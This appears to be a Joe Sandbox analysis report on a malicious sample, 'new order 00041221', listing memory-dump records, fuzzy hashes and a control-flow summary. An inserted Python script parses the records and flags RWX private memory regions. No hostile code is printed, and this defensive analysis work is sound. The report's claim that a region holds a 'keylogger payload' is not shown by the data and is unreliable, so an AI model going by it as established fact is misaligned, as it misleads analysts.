                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 379d66e5582d174ed5e734e090a57ccc828012e8b74905d03b298ab1b0e20fcc
                                            • Instruction ID: 82f8ef9080be793003d24bafd8d196a684d81f6d078b1717bacdcc3c2d9e1ab5
                                            • Opcode Fuzzy Hash: 379d66e5582d174ed5e734e090a57ccc828012e8b74905d03b298ab1b0e20fcc
                                            • Instruction Fuzzy Hash: C751A674E10308DFEB18DFAAD594A9EBBB2FF89300F249169E915AB364DB305841CF54

                                            Control-flow Graph

                                            APIs
                                            • LdrInitializeThunk.NTDLL(00000000), ref: 05A39CD6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e39888e059605250c94caa20a281583d2001e0d00abd46eed6b4d5334bae92ae
                                            • Instruction ID: 6d0bc07de511e130f30bedd01b4d35befb347cd868d2ef1bd59aff5dbc7b82e8
                                            • Opcode Fuzzy Hash: e39888e059605250c94caa20a281583d2001e0d00abd46eed6b4d5334bae92ae
                                            • Instruction Fuzzy Hash: 17115974E042098FEB04DFA9D485EAEBBF5FF88308F148165E804E7351D6719D41CB60

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45745116ac4363bd8559b5dfd03fe45593b266e73a68f4b1f7846e8039833235
                                            • Instruction ID: b1773e871407566e87bdc42a411cb8adcd4dab970ace2d7a9738de4610999b1f
                                            • Opcode Fuzzy Hash: 45745116ac4363bd8559b5dfd03fe45593b266e73a68f4b1f7846e8039833235
                                            • Instruction Fuzzy Hash: FA522030A102198FEB25DBA4C854BAEBB73FF98300F1081A9D10AAB7A5DF355D46DF51

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9153ca1859443b9926e4b196d17fa7e4b620957ed7213e32562842d94362d0ee
                                            • Instruction ID: cf9c3b40ef1765d2592803305361ebdd5638ad4409e37f9fb71ee19d4cc1efef
                                            • Opcode Fuzzy Hash: 9153ca1859443b9926e4b196d17fa7e4b620957ed7213e32562842d94362d0ee
                                            • Instruction Fuzzy Hash: 011281350212478FEB646B20F2BC16ABBE5FB5F323706AC44E11F8845CEB7145888F26

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71ba43e737d7cecc3cd7cb62946017181f3e66d402d1a822e16f0378b079ab11
                                            • Instruction ID: ed1bd5da1ae961d4b1e8ceb0a3c3cac6bae8a85a729ab8b7d69dcedd41b8a1b1
                                            • Opcode Fuzzy Hash: 71ba43e737d7cecc3cd7cb62946017181f3e66d402d1a822e16f0378b079ab11
                                            • Instruction Fuzzy Hash: F542FD34E1021D8FEB25DBA4C850BAEBA72FF98300F1081A9D10A6B3A5DF355E46DF51

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae97ed519694aa3676c185f591f00e2063cf0c2d05f418a1b60ebceaa812204e
                                            • Instruction ID: e89102695ee059a934c632d70001e9d67acb0a949c7dc7753f98582c39902046
                                            • Opcode Fuzzy Hash: ae97ed519694aa3676c185f591f00e2063cf0c2d05f418a1b60ebceaa812204e
                                            • Instruction Fuzzy Hash: 8052A074D0022ACFCF64EF65E998A9DBBB2FB49301F104695E509AB358DB306D85CF81

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa9dda84f9dfee4a68b8b3cdc1123291ad34678167640eb8bd1a01820de0287e
                                            • Instruction ID: 1c47f829d542b483d906d9a741f5bcfd3798847ef35866501b0eca227a02eba8
                                            • Opcode Fuzzy Hash: aa9dda84f9dfee4a68b8b3cdc1123291ad34678167640eb8bd1a01820de0287e
                                            • Instruction Fuzzy Hash: C552A074D0022ACFCF64EF65E998A9DBBB2FB49301F104695E509AB358DB306D85CF81

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f70631cbdf92414199d05c2572f72b63be0a1e76adc17a03b6e8f7595212aaf4
                                            • Instruction ID: 441d33ff9fa684505999d21b7276b7f9a2bd4cffb6de84c0f99020d0d54e3607
                                            • Opcode Fuzzy Hash: f70631cbdf92414199d05c2572f72b63be0a1e76adc17a03b6e8f7595212aaf4
                                            • Instruction Fuzzy Hash: 37124B30A1020ADFDB25CF69D888AAEBBF2FF89314F158599E645DB261D730ED41CB50

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79333da0f7e1f664c1fba3d78090b5e5ccf2e572b079b29bd3596ee639b835b5
                                            • Instruction ID: 7191a2002b11791a6f0d026ab09a2561519d18bb45eb1f5e56f752095f730945
                                            • Opcode Fuzzy Hash: 79333da0f7e1f664c1fba3d78090b5e5ccf2e572b079b29bd3596ee639b835b5
                                            • Instruction Fuzzy Hash: 52B1C0307246128FEB269F29D858B7F7BE2BF89200F148569E506CB395DB74CC42C791

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0257c3422b105a7a827ba02a3056469fbc3f126cc3e8501b5be9bd56ed2c5626
                                            • Instruction ID: ad89ad5161c43bcffc216958c8bf114d7ea5c2cc0e0de0b1deecad0e72c53452
                                            • Opcode Fuzzy Hash: 0257c3422b105a7a827ba02a3056469fbc3f126cc3e8501b5be9bd56ed2c5626
                                            • Instruction Fuzzy Hash: A981AF30A20906CFEB18CF6DD484AABBBF2FF89210B548169D605EB365DB35EC41CB50

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 645a3a9b6f415b5334a4a9d9ce10b70753ba41d648c3b7520eff5943179a24be
                                            • Instruction ID: d16d78ae3f5b1ee50292ecb0bd12d79df176303155e61aea8dfa83caf968f583
                                            • Opcode Fuzzy Hash: 645a3a9b6f415b5334a4a9d9ce10b70753ba41d648c3b7520eff5943179a24be
                                            • Instruction Fuzzy Hash: 4F71A571B102158FCB15DF68D858AAFBBF6BFC8320B148169E516DB395DB319C02CB94

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
[Control-flow graph rendered in the report; the basic-block edge list is not reproduced. Function entry block at 0x12780d8; the graph contains two calls to 0x12776a8 and calls to 0x1278370 and 0x1278380.]
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e10c17fddafad5ee4fcdb307762117de08e5b0ca785eaba1ece12665274aaa1d
                                            • Instruction ID: 4ce26497f113d395f4726b9a736885de02d9ef771045138e95790b49090f28eb
                                            • Opcode Fuzzy Hash: e10c17fddafad5ee4fcdb307762117de08e5b0ca785eaba1ece12665274aaa1d
                                            • Instruction Fuzzy Hash: 94716C343206468FDB25DF6DD88CA6F7BE5AF49201B1900AAEA01DB3B1DB70DC41CB60
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c84b5bad94f987fe38172567863ecab25e48ee622d88884fac540cdb9d24260
                                            • Instruction ID: 43f4967554ee05ca7b9bacec7047670b920d769c56175962c364ab9daf2d13a0
                                            • Opcode Fuzzy Hash: 9c84b5bad94f987fe38172567863ecab25e48ee622d88884fac540cdb9d24260
                                            • Instruction Fuzzy Hash: BE611274D00318DFDB25DFA5D948BAEBBB2FF88300F608129E805AB294DB756946CF40
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3c004e0857c70f29bcc1cc2801146eb38a76eac9d6ff734543bedb6ec79a4c3
                                            • Instruction ID: cc2f94719608702de350b0fadd95c364abbe3eefd51a14422dd2bcfde79efe59
                                            • Opcode Fuzzy Hash: f3c004e0857c70f29bcc1cc2801146eb38a76eac9d6ff734543bedb6ec79a4c3
                                            • Instruction Fuzzy Hash: 25515E307103069FDB15DF69D844BABBBE6EB88324F14846AEA09CB355D771CC42CBA1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 694d6ff068f95a3c44949eb59954ee6a207125bcffec927f1b2a0e5102a3b751
                                            • Instruction ID: 5e9d323038aa36c065f7c486773006dac5e47ca442a3f35215d1eaf26e861d84
                                            • Opcode Fuzzy Hash: 694d6ff068f95a3c44949eb59954ee6a207125bcffec927f1b2a0e5102a3b751
                                            • Instruction Fuzzy Hash: 9051A474E11218DFDB54DFAAD88499DBBF2FF89310F208169E809AB365DB31A901CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e44fd41b79c4fc0c521171cac2bbae52e757ccdcbb6007eedf06ea67ded957cd
                                            • Instruction ID: 87cfc8d3a42c0c8173df361977e03f469f73fa245875db64e7150fd04ce1aefe
                                            • Opcode Fuzzy Hash: e44fd41b79c4fc0c521171cac2bbae52e757ccdcbb6007eedf06ea67ded957cd
                                            • Instruction Fuzzy Hash: 9E51A875E01218CFCB18EFA9D48499DBBF6FF89300B209569E815AB324DB31AD42CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ec916d7c7e560e8e500cba2aaab1ecde753d8cf7970e6294b122987639f4d54
                                            • Instruction ID: 6a76bf5d584182850d716fcb73c970834b41e50df42dd549b3bfc1c8f1adf244
                                            • Opcode Fuzzy Hash: 9ec916d7c7e560e8e500cba2aaab1ecde753d8cf7970e6294b122987639f4d54
                                            • Instruction Fuzzy Hash: CC41B431A10249DFCF12CFA8D858A9FBFB1FF85320F088555E9059B2A1D375D914CB60
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9693cd8e6c3d5ed66e4e722d20128e6492bc6d4a869ddd31eaf913c87414e19c
                                            • Instruction ID: 851d1685344fbbe91de52d54d1c99d0fca0c3c72e841a2497a019a64b03901a9
                                            • Opcode Fuzzy Hash: 9693cd8e6c3d5ed66e4e722d20128e6492bc6d4a869ddd31eaf913c87414e19c
                                            • Instruction Fuzzy Hash: D4316E3131011ADFCF169F68E858AAFBBF2FB48201F004428FA159B395DB75D965CBA1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c259199432c646386f5bb0d8ac1d2d10ebe5a0c7e107319461d4cd8a8cc2d3a6
                                            • Instruction ID: 09d3301cb88ab07f6b4e691772487b3694f8ef34b1d8796a96715eb286ead22e
                                            • Opcode Fuzzy Hash: c259199432c646386f5bb0d8ac1d2d10ebe5a0c7e107319461d4cd8a8cc2d3a6
                                            • Instruction Fuzzy Hash: 4721B2303202028BDB261779947C63F6AE6EFC4759714406ED646CB25AEAB5C842D381
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0aa74dded5791efb40db1bb5829d6fa3e58297f392b51caa1cddd2526eedbfaa
                                            • Instruction ID: 9eecf470e83c419d9b155bb27f1ffd409a6ac0de7610a7c1fea36135d06bceed
                                            • Opcode Fuzzy Hash: 0aa74dded5791efb40db1bb5829d6fa3e58297f392b51caa1cddd2526eedbfaa
                                            • Instruction Fuzzy Hash: 482192303202128BEB255669947C73F66D7EFC4759F14803DD606CB799EEB5CC829381
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d26295a7d3143f7c4efb09d664aff36fac6c12bf229bdaf781a2d329151f1ea
                                            • Instruction ID: 2a5abf6b30c4d47cb163460c536c0108cfaf0df61c401eef0c110e990dfa3273
                                            • Opcode Fuzzy Hash: 9d26295a7d3143f7c4efb09d664aff36fac6c12bf229bdaf781a2d329151f1ea
                                            • Instruction Fuzzy Hash: EE21F235314A128FEB269B29D45852FBBA2FFC9B513048169E916CF798CF30CC02CB80
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba526a730a9657325ebeedf48ed06575d6983ec216d67c47686e45430d73aa85
                                            • Instruction ID: b39ed9c1903b542031f201c281c83e43e28586d6acf463c2a81a80117312e6f6
                                            • Opcode Fuzzy Hash: ba526a730a9657325ebeedf48ed06575d6983ec216d67c47686e45430d73aa85
                                            • Instruction Fuzzy Hash: C8218135E00215DFCF15DF28C440AAF7BA5EB99360B648519E91A9B388DB31EE42CBD1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3708841187.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_120d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56a0346c7421ff02f42816400ced3bbf12be7d1dafb3c7f768eb73518cea7241
                                            • Instruction ID: c00452f66d0cb811ddc68ff00f2b8de30299027e7ff3666f2105bed529f49ad6
                                            • Opcode Fuzzy Hash: 56a0346c7421ff02f42816400ced3bbf12be7d1dafb3c7f768eb73518cea7241
                                            • Instruction Fuzzy Hash: D4213671515208DFDB06DF94E9C0B16BF65FB84324F20C669ED090A297C336D406CAA2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3709076164.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_121d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0f5b82d21e1c544461d118ae795f2398517e6ca88d5752dced2ece11abe681d
                                            • Instruction ID: 8bd0b034db07be5214e52f7e10782624b8d1b022188719f552b66e8f69b37ceb
                                            • Opcode Fuzzy Hash: c0f5b82d21e1c544461d118ae795f2398517e6ca88d5752dced2ece11abe681d
                                            • Instruction Fuzzy Hash: 0F214271614208DFDB14DF64C8C8B22BBA1FB94314F20C6ADE9490B24AC777D847CA62
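Every "Memory Dump Source" record in this part of the report points at one of a handful of memory regions (0x1270000, 0x120D000, 0x121D000) that the IDA plugin could not map back to a PE image ("based on PE: false"), which is the usual picture for code unpacked or injected at run time. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses these records out of the report text, counts functions per dumped region, and checks the page's own invariants (Opcode ID equals Opcode Fuzzy Hash, hashes are hex). Decoding the dotted .sdmp file name positionally as base address, page protection and memory type is an assumption; the report does not document that naming. The sample input is a constructed excerpt copied from three of the records on this page.

```python
"""Summarise Joe Sandbox 'Memory Dump Source' records (added example, not Joe Sandbox code)."""
import re
from collections import Counter

# Constructed excerpt in the report's own layout; values copied from records on this page.
SAMPLE = """\
Memory Dump Source
• Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e10c17fddafad5ee4fcdb307762117de08e5b0ca785eaba1ece12665274aaa1d
• Instruction ID: 4ce26497f113d395f4726b9a736885de02d9ef771045138e95790b49090f28eb
• Opcode Fuzzy Hash: e10c17fddafad5ee4fcdb307762117de08e5b0ca785eaba1ece12665274aaa1d
• Instruction Fuzzy Hash: 94716C343206468FDB25DF6DD88CA6F7BE5AF49201B1900AAEA01DB3B1DB70DC41CB60
Memory Dump Source
• Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
• Opcode ID: 9c84b5bad94f987fe38172567863ecab25e48ee622d88884fac540cdb9d24260
• Instruction ID: 43f4967554ee05ca7b9bacec7047670b920d769c56175962c364ab9daf2d13a0
• Opcode Fuzzy Hash: 9c84b5bad94f987fe38172567863ecab25e48ee622d88884fac540cdb9d24260
• Instruction Fuzzy Hash: BE611274D00318DFDB25DFA5D948BAEBBB2FF88300F608129E805AB294DB756946CF40
Memory Dump Source
• Source File: 00000003.00000002.3708841187.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_120d000_new order 00041221.jbxd
• Opcode ID: 56a0346c7421ff02f42816400ced3bbf12be7d1dafb3c7f768eb73518cea7241
• Instruction ID: c00452f66d0cb811ddc68ff00f2b8de30299027e7ff3666f2105bed529f49ad6
• Opcode Fuzzy Hash: 56a0346c7421ff02f42816400ced3bbf12be7d1dafb3c7f768eb73518cea7241
• Instruction Fuzzy Hash: D4213671515208DFDB06DF94E9C0B16BF65FB84324F20C669ED090A297C336D406CAA2
"""

FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*?)\s*$")
SOURCE_RE = re.compile(r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)$")
PAGE_EXECUTE_READWRITE = 0x40   # winnt.h page protection
MEM_PRIVATE = 0x20000           # winnt.h memory type


def parse_records(text):
    """Split the report text on 'Memory Dump Source' and collect each record's bullet fields."""
    records = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields = {}
        for line in chunk.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group("key").strip()] = m.group("val")
        src = SOURCE_RE.match(fields.get("Source File", ""))
        if not src:
            continue  # a record cut off by the page boundary has no usable Source File
        records.append({"file": src.group("file"), "offset": src.group("offset").upper(),
                        "based_on_pe": src.group("pe") == "true",
                        "opcode_id": fields.get("Opcode ID", ""),
                        "opcode_fuzzy": fields.get("Opcode Fuzzy Hash", ""),
                        "instruction_fuzzy": fields.get("Instruction Fuzzy Hash", "")})
    return records


def decode_source_file(name):
    """ASSUMED layout of the .sdmp name: pid.dump.serial.base.protect.flags.type.extra (hex fields).
    The report does not document this; only base/protect/type are decoded here."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 8:
        raise ValueError("unexpected .sdmp name: %s" % name)
    base, protect, mem_type = (int(parts[i], 16) for i in (3, 4, 6))
    return {"base": base, "protect": protect, "mem_type": mem_type,
            "rwx": protect == PAGE_EXECUTE_READWRITE, "private": mem_type == MEM_PRIVATE}


def summarise(records):
    """Functions per dumped region, flagged when the region is RWX private memory not backed by a PE."""
    per_region = Counter(r["offset"] for r in records)
    out = {}
    for r in records:
        meta = decode_source_file(r["file"])
        out[r["offset"]] = {"functions": per_region[r["offset"]],
                            "base_matches_offset": meta["base"] == int(r["offset"], 16),
                            "suspicious": meta["rwx"] and meta["private"] and not r["based_on_pe"]}
    return out


def inconsistent_ids(records):
    """Return Opcode IDs that are not 64 lowercase hex chars or differ from the Opcode Fuzzy Hash,
    and Instruction Fuzzy Hashes that are not hex; empty on the records shown on this page."""
    bad = []
    for r in records:
        if r["opcode_id"] != r["opcode_fuzzy"] or not re.fullmatch(r"[0-9a-f]{64}", r["opcode_id"]):
            bad.append(r["opcode_id"])
        if not re.fullmatch(r"[0-9A-F]+", r["instruction_fuzzy"]):
            bad.append(r["instruction_fuzzy"])
    return bad


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for offset, info in sorted(summarise(recs).items()):
        print(offset, info)
    print("inconsistent:", inconsistent_ids(recs))
```

Run against the full report text instead of SAMPLE to get one line per dumped region; a region flagged `suspicious` with a high function count is where the unpacked keylogger payload lives and is the dump worth loading into a disassembler first.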
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 232476715f016bc8f5633a3bb039f84c001e059160d58d7592d0df6a712e42c3
                                            • Instruction ID: b19a3c1fbd85f0fc80525109f48ee95cfcdaeb25238ea827acddc7c1da2c0954
                                            • Opcode Fuzzy Hash: 232476715f016bc8f5633a3bb039f84c001e059160d58d7592d0df6a712e42c3
                                            • Instruction Fuzzy Hash: 7321CF3162524A9FCF16AF28E44866BBBF2FB55210F004469F9058F356CB34CD65CBA1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 196cee7e3ae294330cd77e745f258ef683c5e403b6f26792681d7a5974e17fd3
                                            • Instruction ID: 348f78bc8c4c4c18c600c76ee508354bea57bfbb05a2c7b038495a51b3580c71
                                            • Opcode Fuzzy Hash: 196cee7e3ae294330cd77e745f258ef683c5e403b6f26792681d7a5974e17fd3
                                            • Instruction Fuzzy Hash: 07218B70E01249DFDF19CFA6E550AEEBFB6EF49314F248059E500AA294DB30D981DB20
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52c7963afde9367302bd260c9eb0b40e4e47240f616652c49e2dfcb0543e8790
                                            • Instruction ID: 9a500227bfa48a6621aefc66fad037ce2644c6777e2719e92da5acb39a73a0e5
                                            • Opcode Fuzzy Hash: 52c7963afde9367302bd260c9eb0b40e4e47240f616652c49e2dfcb0543e8790
                                            • Instruction Fuzzy Hash: 4D118235311A129FEB255B2AD45892F7BE6FFC5B613094168EA16CB764CF31DC02C790
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c362cec69182cdcd0ef0a27d6cab735edccc2b1f3c0ab616f5f8fd80053cb935
                                            • Instruction ID: e81ecea319b3c28fdf5a1deb6e7f426ebbf600922f804da1bdf3d555c743d29f
                                            • Opcode Fuzzy Hash: c362cec69182cdcd0ef0a27d6cab735edccc2b1f3c0ab616f5f8fd80053cb935
                                            • Instruction Fuzzy Hash: E4218CB4D10219DFEB15EFA9E54079FBFF2FB84304F0086A9D1199B259EB305A069F81
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9d864ee0258a152e83e2affcdd5b6664be5d89e7be56fee0763742b987a834b
                                            • Instruction ID: 72765fe377a75a1f206e0d74de0f1df03725fceae4ca4ce8744003de087309bf
                                            • Opcode Fuzzy Hash: b9d864ee0258a152e83e2affcdd5b6664be5d89e7be56fee0763742b987a834b
                                            • Instruction Fuzzy Hash: 1221BD74D1421ACFCB00EFA9D8495EEBBF4FF0A310F10466AD809B6214EB355A85CFA1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3708841187.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_120d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
